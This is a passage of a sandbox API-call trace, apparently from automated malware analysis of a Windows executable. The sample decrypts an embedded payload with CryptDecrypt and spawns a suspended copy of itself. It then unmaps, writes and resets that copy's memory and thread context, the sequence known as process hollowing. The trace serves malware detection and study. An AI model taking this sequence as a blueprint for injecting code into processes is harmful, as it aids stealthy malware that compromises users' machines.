dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.112] lstrcpynA (in: lpString1=0x4226c1, lpString2="5939232", iMaxLength=1024 | out: lpString1="5939232") returned="5939232" [0030.112] lstrlenA (lpString="5939232") returned 7 [0030.112] lstrcpynA (in: lpString1=0x5d261c, lpString2="*5939232(&t255 .r5)", iMaxLength=1024 | out: lpString1="*5939232(&t255 .r5)") returned="*5939232(&t255 .r5)" [0030.112] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.113] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.113] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.113] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.113] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.113] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.113] lstrcpyA (in: lpString1=0x5cc118, lpString2="5939232" | out: lpString1="5939232") returned="5939232" [0030.113] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.113] lstrcpynA (in: lpString1=0x5ca488, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.113] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.113] lstrcpynA (in: lpString1=0x5cb908, lpString2="::32237925(", iMaxLength=1024 | out: lpString1="::32237925(") returned="::32237925(" [0030.113] lstrcpyA (in: lpString1=0x425400, lpString2="::32237925(" | out: lpString1="::32237925(") returned="::32237925(" [0030.113] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.113] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.113] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.113] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.113] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.113] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.113] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.113] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.113] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.113] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.113] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.114] lstrcpynA (in: lpString1=0x4226c0, lpString2="::32237925(", iMaxLength=1024 | out: lpString1="::32237925(") returned="::32237925(" [0030.114] lstrlenA (lpString="::32237925(") returned 11 [0030.114] lstrcpynA (in: lpString1=0x5d0824, lpString2="::32237925(p r13, i 55312)", iMaxLength=1024 | out: lpString1="::32237925(p r13, i 55312)") returned="::32237925(p r13, i 55312)" [0030.114] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.114] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.114] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.114] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.114] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.114] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.114] lstrcpyA (in: lpString1=0x5cbd18, lpString2="" | out: lpString1="") returned="" [0030.114] lstrcpyA (in: lpString1=0x5cc118, lpString2="32237925" | out: lpString1="32237925") returned="32237925" [0030.114] lstrcpynA (in: lpString1=0x5cb908, lpString2="32182285", iMaxLength=1024 | out: lpString1="32182285") returned="32182285" [0030.114] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0036.353] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.358] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.358] CryptAcquireContextW (in: phProv=0x19fa3c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19fa3c*=0x5cb028) returned 1 [0036.641] CryptCreateHash (in: hProv=0x5cb028, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fa40 | out: phHash=0x19fa40) returned 1 [0036.645] CryptHashData (hHash=0x59e2c8, pbData=0x19fb74, dwDataLen=0x10, dwFlags=0x1) returned 1 [0036.646] CryptDeriveKey (in: hProv=0x5cb028, Algid=0x6610, hBaseData=0x59e2c8, dwFlags=0x1, phKey=0x19fa38 | out: phKey=0x19fa38*=0x59e308) returned 1 [0036.651] CryptDestroyHash (hHash=0x59e2c8) returned 1 [0036.651] VirtualAlloc (lpAddress=0x0, dwSize=0xdbf8, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0036.652] CryptDecrypt (in: hKey=0x59e308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x340000, pdwDataLen=0x19fb90 | out: pbData=0x340000, pdwDataLen=0x19fb90) returned 1 [0036.655] CryptDestroyKey (hKey=0x59e308) returned 1 [0036.655] CryptReleaseContext (hProv=0x5cb028, dwFlags=0x0) returned 1 [0036.655] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f450, nSize=0x103 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe")) returned 0x32 [0036.655] GetCommandLineW () returned="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" [0036.655] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe", lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f924*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f99c | out: lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"", lpProcessInformation=0x19f99c*(hProcess=0x238, hThread=0x22c, dwProcessId=0xfe0, dwThreadId=0xfe4)) returned 1 [0036.667] GetThreadContext (in: hThread=0x22c, lpContext=0x19f658 | out: lpContext=0x19f658*(ContextFlags=0x10007, Dr0=0x19f740, Dr1=0x74254b82, Dr2=0xd800, Dr3=0x0, Dr6=0x19f740, Dr7=0x74254bef, FloatSave.ControlWord=0x34d800, FloatSave.StatusWord=0x19f72c, FloatSave.TagWord=0x10, FloatSave.ErrorOffset=0x19fb90, FloatSave.ErrorSelector=0x5ca4b0, FloatSave.DataOffset=0x74254afb, FloatSave.DataSelector=0xfffffffe, FloatSave.RegisterArea=([0]=0x86, [1]=0x5, [2]=0x0, [3]=0x0, [4]=0x30, [5]=0x3b, [6]=0x5b, [7]=0x0, [8]=0x1a, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x3c, [17]=0x8, [18]=0xca, [19]=0x22, [20]=0x8, [21]=0xca, [22]=0x22, [23]=0x3c, [24]=0x3c, [25]=0x8, [26]=0xca, [27]=0x22, [28]=0x8, [29]=0xca, [30]=0x22, [31]=0x3c, [32]=0x10, [33]=0xf7, [34]=0x19, [35]=0x0, [36]=0xac, [37]=0x9a, [38]=0x25, [39]=0x74, [40]=0x48, [41]=0xf7, [42]=0x19, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x90, [49]=0xfb, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x10, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x34, [71]=0x0, [72]=0xd4, [73]=0xa4, [74]=0x5c, [75]=0x0, [76]=0x1, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x5ca4d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x4032bf, Ebp=0x0, Eip=0x771faef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x42, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x50, [5]=0xdb, [6]=0x5c, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0xd9, [17]=0xd2, [18]=0x1c, [19]=0x77, [20]=0xa6, [21]=0x52, [22]=0x48, [23]=0xeb, [24]=0xd9, [25]=0xd2, [26]=0x1c, [27]=0x77, [28]=0xde, [29]=0x52, [30]=0x48, [31]=0xeb, [32]=0x0, [33]=0x0, [34]=0x59, [35]=0x0, [36]=0x20, [37]=0xb0, [38]=0x5c, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x1c, [45]=0x0, [46]=0x0, [47]=0x1c, [48]=0x10, [49]=0xd8, [50]=0x0, [51]=0x0, [52]=0xa, [53]=0x0, [54]=0x0, [55]=0xa, [56]=0xd9, [57]=0xd2, [58]=0x1c, [59]=0x77, [60]=0x2, [61]=0x0, [62]=0x0, [63]=0x2, [64]=0x0, [65]=0x0, [66]=0x59, [67]=0x0, [68]=0x0, [69]=0xb9, [70]=0x5c, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x86, [77]=0x5, [78]=0x0, [79]=0x83, [80]=0xc0, [81]=0x47, [82]=0x25, [83]=0x74, [84]=0x4, [85]=0x0, [86]=0x0, [87]=0x4, [88]=0xcc, [89]=0xf7, [90]=0x19, [91]=0x0, [92]=0xa, [93]=0x0, [94]=0x0, [95]=0xa, [96]=0xb0, [97]=0xa4, [98]=0x5c, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x34, [103]=0x0, [104]=0x74, [105]=0xff, [106]=0xff, [107]=0xff, [108]=0x86, [109]=0x5, [110]=0x0, [111]=0x83, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0xf5, [117]=0x0, [118]=0x0, [119]=0xf5, [120]=0xfe, [121]=0xff, [122]=0xff, [123]=0xff, [124]=0x1c, [125]=0x0, [126]=0x0, [127]=0x1c, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x80, [133]=0xa4, [134]=0x5c, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x59, [139]=0x0, [140]=0x20, [141]=0xb0, [142]=0x5c, [143]=0x0, [144]=0x84, [145]=0x2, [146]=0x59, [147]=0x0, [148]=0x90, [149]=0xa4, [150]=0x5c, [151]=0x0, [152]=0x80, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x86, [157]=0x0, [158]=0x0, [159]=0x86, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x1c, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x59, [171]=0x0, [172]=0x1, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x54, [177]=0x58, [178]=0x59, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x80, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0xa, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0xe0, [193]=0x26, [194]=0x59, [195]=0x0, [196]=0x6, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0xa, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x28, [213]=0xb0, [214]=0x5c, [215]=0x0, [216]=0x1b, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0xd0, [221]=0xa9, [222]=0x5a, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x1b, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x1b, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x1b, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0xc7, [242]=0x1c, [243]=0x1, [244]=0x60, [245]=0x2, [246]=0x59, [247]=0x0, [248]=0x1b, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x60, [253]=0x2, [254]=0x59, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x1, [260]=0x88, [261]=0x7e, [262]=0x59, [263]=0x0, [264]=0x88, [265]=0xde, [266]=0x5a, [267]=0x0, [268]=0xbc, [269]=0xf8, [270]=0x19, [271]=0x0, [272]=0x40, [273]=0xd, [274]=0x20, [275]=0x77, [276]=0xf6, [277]=0xbc, [278]=0x79, [279]=0x9c, [280]=0xfe, [281]=0xff, [282]=0xff, [283]=0xff, [284]=0x74, [285]=0xf8, [286]=0x19, [287]=0x0, [288]=0x50, [289]=0xc6, [290]=0x20, [291]=0x77, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x28, [297]=0xb0, [298]=0x5c, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x28, [305]=0xb0, [306]=0x5c, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x88, [313]=0xde, [314]=0x5a, [315]=0x0, [316]=0x28, [317]=0xb0, [318]=0x5c, [319]=0x0, [320]=0x8, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x88, [325]=0x7e, [326]=0x59, [327]=0x0, [328]=0x9c, [329]=0xf8, [330]=0x19, [331]=0x0, [332]=0x3a, [333]=0xc6, [334]=0x20, [335]=0x77, [336]=0x84, [337]=0xf8, [338]=0x19, [339]=0x0, [340]=0x2c, [341]=0xc7, [342]=0x1c, [343]=0x77, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0xcc, [353]=0xf8, [354]=0x19, [355]=0x0, [356]=0xb7, [357]=0x1c, [358]=0xfc, [359]=0x75, [360]=0x0, [361]=0x0, [362]=0x59, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0xd0, [369]=0x1c, [370]=0xfc, [371]=0x75, [372]=0xf0, [373]=0xb0, [374]=0x97, [375]=0xd3, [376]=0x1, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x28, [381]=0xb0, [382]=0x5c, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x59, [391]=0x0, [392]=0xc8, [393]=0xf8, [394]=0x19, [395]=0x0, [396]=0x4c, [397]=0x8b, [398]=0x20, [399]=0x73, [400]=0x98, [401]=0xf8, [402]=0x19, [403]=0x0, [404]=0x8, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0xf9, [410]=0x19, [411]=0x0, [412]=0xa0, [413]=0x89, [414]=0xff, [415]=0x75, [416]=0xcc, [417]=0xb1, [418]=0x8b, [419]=0xa5, [420]=0xfe, [421]=0xff, [422]=0xff, [423]=0xff, [424]=0xd0, [425]=0x1c, [426]=0xfc, [427]=0x75, [428]=0xb7, [429]=0x53, [430]=0x23, [431]=0x73, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0xfd, [437]=0xac, [438]=0xba, [439]=0xcc, [440]=0x38, [441]=0xfa, [442]=0x19, [443]=0x0, [444]=0xb0, [445]=0xf9, [446]=0x19, [447]=0x0, [448]=0xe5, [449]=0x53, [450]=0x23, [451]=0x73, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xfd, [465]=0xac, [466]=0xba, [467]=0xcc, [468]=0xd8, [469]=0xf8, [470]=0x19, [471]=0x0, [472]=0xd4, [473]=0xf8, [474]=0x19, [475]=0x0, [476]=0xcc, [477]=0xff, [478]=0x19, [479]=0x0, [480]=0x20, [481]=0x66, [482]=0x23, [483]=0x73, [484]=0x5d, [485]=0x90, [486]=0x80, [487]=0xbf, [488]=0xfe, [489]=0xff, [490]=0xff, [491]=0xff, [492]=0x48, [493]=0xfa, [494]=0x19, [495]=0x0, [496]=0x6c, [497]=0xf9, [498]=0xeb, [499]=0x1, [500]=0x28, [501]=0xb0, [502]=0x5c, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x74, [509]=0xfb, [510]=0x19, [511]=0x0))) returned 1 [0036.684] ReadProcessMemory (in: hProcess=0x238, lpBaseAddress=0x7ffde008, lpBuffer=0x19f998, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f998*, lpNumberOfBytesRead=0x0) returned 1 [0036.687] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.688] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f2f4 | out: Wow64Process=0x19f2f4) returned 1 [0036.691] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.691] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0036.691] GetFileSize (in: hFile=0x240, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.691] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.692] ReadFile (in: hFile=0x240, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f330*=0x176638, lpOverlapped=0x0) returned 1 [0036.721] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.740] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.745] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.753] NtUnmapViewOfSection (ProcessHandle=0x1ec067a, BaseAddress=0x400000) returned 0x0 [0036.758] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.759] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f2b0 | out: Wow64Process=0x19f2b0) returned 1 [0036.763] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.764] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0036.764] GetFileSize (in: hFile=0x240, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.764] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.765] ReadFile (in: hFile=0x240, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f2ec, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f2ec*=0x176638, lpOverlapped=0x0) returned 1 [0036.783] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.800] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.806] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.814] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.815] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f284 | out: Wow64Process=0x19f284) returned 1 [0036.818] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.818] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0036.818] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.818] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.819] ReadFile (in: hFile=0x23c, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f2c0, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f2c0*=0x176638, lpOverlapped=0x0) returned 1 [0036.831] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.847] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.852] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.862] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.863] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f284 | out: Wow64Process=0x19f284) returned 1 [0036.866] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.866] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0036.866] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.866] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.867] ReadFile (in: hFile=0x23c, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f2c0, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f2c0*=0x176638, lpOverlapped=0x0) returned 1 [0036.880] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.896] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.901] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.910] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.911] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f2c4 | out: Wow64Process=0x19f2c4) returned 1 [0036.914] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.914] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0036.914] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.914] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.915] ReadFile (in: hFile=0x23c, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f300, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f300*=0x176638, lpOverlapped=0x0) returned 1 [0036.927] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.943] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.948] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.952] NtWriteVirtualMemory (in: ProcessHandle=0x1ec067a, BaseAddress=0x7ffde008, Buffer=0x19f9b0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x19f9b0*, NumberOfBytesWritten=0x0) returned 0x0 [0036.954] SetThreadContext (hThread=0x22c, lpContext=0x19f658*(ContextFlags=0x10007, Dr0=0x19f740, Dr1=0x74254b82, Dr2=0xd800, Dr3=0x0, Dr6=0x19f740, Dr7=0x74254bef, FloatSave.ControlWord=0x34d800, FloatSave.StatusWord=0x19f72c, FloatSave.TagWord=0x10, FloatSave.ErrorOffset=0x19fb90, FloatSave.ErrorSelector=0x5ca4b0, FloatSave.DataOffset=0x74254afb, 